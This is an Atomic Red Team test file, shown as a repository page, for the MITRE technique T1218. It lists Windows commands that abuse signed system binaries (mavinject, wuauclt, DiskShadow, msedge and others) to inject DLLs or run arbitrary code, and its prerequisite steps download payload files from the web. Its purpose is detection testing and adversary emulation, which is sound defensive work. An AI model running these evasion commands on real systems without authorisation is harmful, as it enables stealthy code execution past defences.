security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1218/T1218.yaml
T
Atomic Red Team doc generator 33939648b7 Generated docs from job=generate-docs branch=master [ci skip]
2024-07-24 02:37:54 +00:00

419 lines
18 KiB
YAML
Raw Permalink Blame History

attack_technique: T1218
display_name: Signed Binary Proxy Execution
atomic_tests:
- name: mavinject - Inject DLL into running process
auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61
description: |
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
supported_platforms:
- windows
input_arguments:
process_id:
description: PID of process receiving injection
type: string
default: "1000"
dll_payload:
description: DLL to inject
type: path
default: PathToAtomicsFolder\T1218\src\x64\T1218.dll
dependency_executor_name: powershell
dependencies:
- description: |
T1218.dll must exist on disk at specified location (#{dll_payload})
prereq_command: |
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}"
executor:
command: |
mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}"
name: command_prompt
elevation_required: true
- name: Register-CimProvider - Execute evil dll
auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655
description: |
Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
supported_platforms:
- windows
input_arguments:
dll_payload:
description: DLL to execute
type: path
default: PathToAtomicsFolder\T1218\src\Win32\T1218-2.dll
dependency_executor_name: powershell
dependencies:
- description: |
T1218-2.dll must exist on disk at specified location (#{dll_payload})
prereq_command: |
if (Test-Path "#{dll_payload}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
executor:
command: |
C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"
name: command_prompt
- name: InfDefaultInstall.exe .inf Execution
auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
description: |
Test execution of a .inf using InfDefaultInstall.exe
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
supported_platforms:
- windows
input_arguments:
inf_to_execute:
description: Local location of inf file
type: string
default: PathToAtomicsFolder\T1218\src\Infdefaultinstall.inf
dependency_executor_name: powershell
dependencies:
- description: |
INF file must exist on disk at specified location (#{inf_to_execute})
prereq_command: |
if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}"
executor:
command: |
InfDefaultInstall.exe "#{inf_to_execute}"
name: command_prompt
- name: ProtocolHandler.exe Downloaded a Suspicious File
auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2
description: |
Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
supported_platforms:
- windows
input_arguments:
remote_url:
description: url to document
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx
dependency_executor_name: powershell
dependencies:
- description: |
Microsoft Word must be installed
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
Stop-Process -Name "winword"
exit 0 } catch { exit 1 }
get_prereq_command: |
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
executor:
name: command_prompt
elevation_required: false
command: |
FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
- name: Microsoft.Workflow.Compiler.exe Payload Execution
auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e
description: |
Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
supported_platforms:
- windows
input_arguments:
xml_payload:
description: XML to execution
type: path
default: PathToAtomicsFolder\T1218\src\T1218.xml
mwcpath:
description: Default location of Microsoft.Workflow.Compiler.exe
type: path
default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname:
description: Default name of microsoft.workflow.compiler.exe
type: path
default: microsoft.workflow.compiler.exe
dependency_executor_name: powershell
dependencies:
- description: |
.Net must be installed for this test to work correctly.
prereq_command: |
if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
get_prereq_command: |
write-host ".Net must be installed for this test to work correctly."
executor:
command: |
#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt
name: powershell
elevation_required: false
- name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions
auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911
description: |
Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
supported_platforms:
- windows
input_arguments:
xml_payload:
description: XML to execution
type: path
default: PathToAtomicsFolder\T1218\src\T1218.xml
renamed_binary:
description: renamed Microsoft.Workflow.Compiler
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe
mwcpath:
description: Default location of Microsoft.Workflow.Compiler.exe
type: path
default: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
mwcname:
description: Default name of microsoft.workflow.compiler.exe
type: path
default: microsoft.workflow.compiler.exe
dependency_executor_name: powershell
dependencies:
- description: |
.Net must be installed for this test to work correctly.
prereq_command: |
if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
executor:
command: |
&"#{renamed_binary}" "#{xml_payload}" output.txt
name: powershell
elevation_required: false
- name: Invoke-ATHRemoteFXvGPUDisablementCommand base test
auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db
description: |
RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).
One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.
Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.
The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.
Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
supported_platforms:
- windows
input_arguments:
module_name:
description: Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified.
type: string
default: foo
module_path:
description: Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\Documents\WindowsPowerShell\Modules.
type: string
default: $PWD
dependencies:
- description: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
executor:
command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}'
name: powershell
- name: DiskShadow Command Execution
auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
description: |
Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
supported_platforms:
- windows
input_arguments:
txt_payload:
description: txt to execute
type: path
default: PathToAtomicsFolder\T1218\src\T1218.txt
dspath:
description: Default location of DiskShadow.exe
type: path
default: C:\Windows\System32\diskshadow.exe
dependency_executor_name: powershell
dependencies:
- description: txt file must exist on disk at specified location (#{txt_payload})
prereq_command: |
if (Test-Path "#{txt_payload}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{txt_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
- description: DiskShadow.exe must exist on disk at specified location (#{dspath})
prereq_command: |
if (Test-Path #{dspath}) {exit 0} else {exit 1}
get_prereq_command: |
echo "DiskShadow.exe not found on disk at expected location"
executor:
command: |
#{dspath} -S #{txt_payload}
name: powershell
elevation_required: false
- name: Load Arbitrary DLL via Wuauclt (Windows Update Client)
auto_generated_guid: 49fbd548-49e9-4bb7-94a6-3769613912b8
description: |
This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched.
See https://dtm.uk/wuauclt/
supported_platforms:
- windows
input_arguments:
arbitrary_dll:
description: Path of DLL to be loaded
type: string
default: PathToAtomicsFolder\T1218\bin\calc.dll
dependency_executor_name: powershell
dependencies:
- description: |
DLL to load must exist on disk as specified location (#{arbitrary_dll})
prereq_command: |
if (test-path "#{arbitrary_dll}"){exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{arbitrary_dll}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
executor:
command: |
wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer
cleanup_command: |-
taskkill /f /im calculator.exe > nul 2>&1
name: command_prompt
- name: Lolbin Gpscript logon option
auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c
description: |
Executes logon scripts configured in Group Policy.
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
supported_platforms:
- windows
executor:
command: |
Gpscript /logon
name: command_prompt
- name: Lolbin Gpscript startup option
auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3
description: |
Executes startup scripts configured in Group Policy
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
supported_platforms:
- windows
executor:
command: |
Gpscript /startup
name: command_prompt
- name: Lolbas ie4uinit.exe use as proxy
auto_generated_guid: 13c0804e-615e-43ad-b223-2dfbacd0b0b3
description: |
Executes commands from a specially prepared ie4uinit.inf file.
Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/
supported_platforms:
- windows
input_arguments:
Path_inf:
description: Path to the cab file
type: path
default: PathToAtomicsFolder\T1218\src\ieuinit.inf
Path_ie4uinit:
description: Path to ie4uinit.exe
type: path
default: c:\windows\system32\ie4uinit.exe
dependency_executor_name: powershell
dependencies:
- description: |
ieuinit.inf must exist on disk at specified location (#{Path_inf})
prereq_command: |
if (Test-Path "#{Path_inf}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{Path_inf}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/ieuinit.inf" -OutFile "#{Path_inf}"
executor:
command: |
copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe
copy "#{Path_inf}" %TEMP%\ieuinit.inf
%TEMP%\ie4uinit.exe -BaseSettings
cleanup_command: |
del %TEMP%\ie4uinit.exe >nul 2>&1
del %TEMP%\ieuinit.inf >nul 2>&1
name: command_prompt
- name: LOLBAS CustomShellHost to Spawn Process
auto_generated_guid: b1eeb683-90bb-4365-bbc2-2689015782fe
description: |
This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
Upon execution, customshellhost.exe will spawn calc.exe.
Note this will only work on Windows 10 or 11.
[LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
[BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
supported_platforms:
- windows
input_arguments:
dest_path:
description: Directory to copy files into
type: path
default: C:\test
executor:
command: |
if (-not (Test-Path #{dest_path})) {
New-Item -Path #{dest_path} -ItemType Directory
} else {
Write-Host "Directory #{dest_path} already exists." }
Copy-Item -Path "C:\windows\system32\customshellhost.exe" -Destination "#{dest_path}\customshellhost.exe" -Force
Copy-Item -Path "C:\windows\system32\calc.exe" -Destination "#{dest_path}\explorer.exe" -Force
#{dest_path}\customshellhost.exe
cleanup_command: |
Remove-Item -Path #{dest_path} -Recurse -Force
name: powershell
elevation_required: true
- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
auto_generated_guid: ab76e34f-28bf-441f-a39c-8db4835b89cc
description: |
Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
- https://twitter.com/0gtweet/status/1674399582162153472
- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
Registry keys are deleted after successful execution.
supported_platforms:
- windows
executor:
command: |
reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0
reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
c:\windows\system32\provlaunch.exe LOLBin
name: command_prompt
- name: LOLBAS Msedge to Spawn Process
auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349
description: |
Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe
- https://lolbas-project.github.io/lolbas/Binaries/Msedge/
supported_platforms:
- windows
executor:
command: |
$edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
if (Test-Path $edgePath64) {
$edgePath = $edgePath64
} else {
# Check 32-bit Edge installation path
$edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
if (Test-Path $edgePath32) {
$edgePath = $edgePath32
} else {
exit 1
}
}
& $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
sleep 5
taskkill -f -im msedge.exe
taskkill -f -im calc.exe
taskkill -f -im win32calc.exe
name: powershell
- name: System Binary Proxy Execution - Wlrmdr Lolbin
auto_generated_guid: 7816c252-b728-4ea6-a683-bd9441ca0b71
description: Use wlrmdr(Windows Logon Reminder executable) as a proxy binary to evade defensive countermeasures
supported_platforms:
- windows
input_arguments:
payload_path:
description: Path to the executable
type: String
default: C:\Windows\System32\calc.exe
executor:
command: wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u "#{payload_path}"
name: powershell
elevation_required: false
Reference in New Issue View Git Blame Copy Permalink